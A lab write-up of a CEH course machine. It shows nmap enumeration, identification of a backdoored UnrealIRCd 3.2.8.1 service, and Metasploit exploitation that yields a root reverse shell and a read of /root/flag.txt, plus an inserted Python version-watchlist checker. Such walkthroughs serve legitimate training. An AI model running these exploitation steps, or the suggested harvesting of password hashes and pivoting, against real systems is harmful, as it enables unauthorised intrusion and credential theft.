This was one of the first machines done during the CEH course. The virtual machine available in my classes was a copy of another one that existed in the lab, so when I finally got access to the lab I merely replicated the actions done in the VM, and this let the description of the machine in the lab pass unnoticed. Had I done a decent job during the enumeration phase, I wouldn’t have lost time looking for a machine with the resources needed later. Were this the OSCP exam, I’d be in trouble.

So one of the lessons learned here was: information gathering, footprinting and scanning must be really well done as it saves time in the future.

Maq106 – MACHINE
Description: Try to discover the vulnerability point(s) of this machine and capture the flag!
The machine may hide interesting secrets for compromising other machines in the Pentest Lab

Let’s start by seeing what we are dealing with. I have an IP address and nothing else.
I’ll look for the running OS and for any open ports.

root@parrot:~# nmap -O -sV
Nmap scan report for
Host is up (0.0071s latency).
Not shown: 994 closed ports
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND 9.5.1-P3
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host: irc.maq106.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.90 seconds

Good enough, it’s a Debian box and we have a few known services running there. The odd one here is the IRC service, so that is where I’ll start poking.

root@parrot:~# locate *.nse | grep irc

There is a script for the very IRC server we found. Let’s see what this irc-unrealircd-backdoor.nse can show us.

root@parrot:~# nmap -p6667 --script irc-unrealircd-backdoor.nse
Nmap scan report for
Host is up (0.0075s latency).
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds

Right, the service is vulnerable; let me just check the IRC service version before proceeding.

root@parrot:~# nmap -p6667 --script irc-info.nse
Nmap scan report for
Host is up (0.039s latency).
6667/tcp open irc
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.maq106.com
| version: Unreal3.2.8.1. irc.maq106.com
| uptime: 1 days, 5:14:01
| source ident: nmap
| source host: 5970F2CA.18AECCC8.1C965CCA.IP
|_ error: Closing Link: ijfqofavr[] (Quit: ijfqofavr)
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

We already had the service name, now we have the version too. Let’s check if we already have an exploit ready for this version.

root@parrot:~# searchsploit unrealirc
------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
UnrealIRCd - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
------------------------------------------------------------- ----------------------------------------
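As an added example (mine, not from the original write-up), the manual version check done above can be scripted from the defender's side: parse the nmap -sV lines and the irc-info output, then flag any service whose product and version sit on a watchlist of known-bad builds. The sample inputs are copied from the scan output in this post; the watchlist contents and the function names are my own.

```python
import re

# Constructed sample inputs, copied from the scan output in this write-up
# (the host IP is absent there as well).
NMAP_SV = """\
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND 9.5.1-P3
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
"""
IRC_INFO = """\
| irc-info:
| server: irc.maq106.com
| version: Unreal3.2.8.1. irc.maq106.com
|_ error: Closing Link: ijfqofavr[] (Quit: ijfqofavr)
"""

# Product/version pairs an inventory should never contain. Only the entry
# from the write-up is listed; the dict shape is my own assumption.
WATCHLIST = {
    ("UnrealIRCd", "3.2.8.1"): "backdoored UnrealIRCd 3.2.8.1 tarball, see seclists fulldisclosure 2010/Jun/277",
}

PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)\s*(.*)$")
UNREAL_VER_RE = re.compile(r"version:\s*Unreal(\d+(?:\.\d+)+)")


def parse_nmap_sv(text):
    """Map port -> (service name, product banner) from nmap -sV normal output."""
    out = {}
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            out[int(m.group(1))] = (m.group(2), m.group(3).strip())
    return out


def unreal_version(irc_info_text):
    """Pull the numeric version out of irc-info script output, or None if absent."""
    m = UNREAL_VER_RE.search(irc_info_text)
    return m.group(1) if m else None


def flag_services(nmap_text, irc_info_text):
    """Return [(port, product, version, reason)] for every watchlisted service.
    nmap -sV only reported 'UnrealIRCd' with no version, so the IRC version is
    taken from the irc-info output, exactly as the write-up did by hand."""
    hits = []
    for port, (name, banner) in parse_nmap_sv(nmap_text).items():
        product = banner.split()[0] if banner else name
        version = unreal_version(irc_info_text) if product == "UnrealIRCd" else None
        reason = WATCHLIST.get((product, version))
        if reason:
            hits.append((port, product, version, reason))
    return hits
```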

I’ll cut to the chase and go straight to Metasploit, pick the module shown above and set its options.

root@parrot:~# service postgresql start
root@parrot:~# msfconsole
msf > search unrealirc
Matching Modules
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD Backdoor Command Execution
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST

Ready to run the exploit.

msf > exploit
[*] Started reverse TCP double handler on
[*] - Connected to
:irc.maq106.com NOTICE AUTH :*** Looking up your hostname...
:irc.maq106.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ealfLbzJRfkl7r18;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ealfLbzJRfkl7r18\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2018-04-24 09:21:40 -0300
cat /root/flag.txt

The exploit finished and I typed whoami to check the prompt: I am root. I then read the flag.txt content (it’s not the real one shown here), but the machine is owned. You can do anything now, like seeing the other users available and their encrypted passwords, or maybe even other networks this machine can reach…
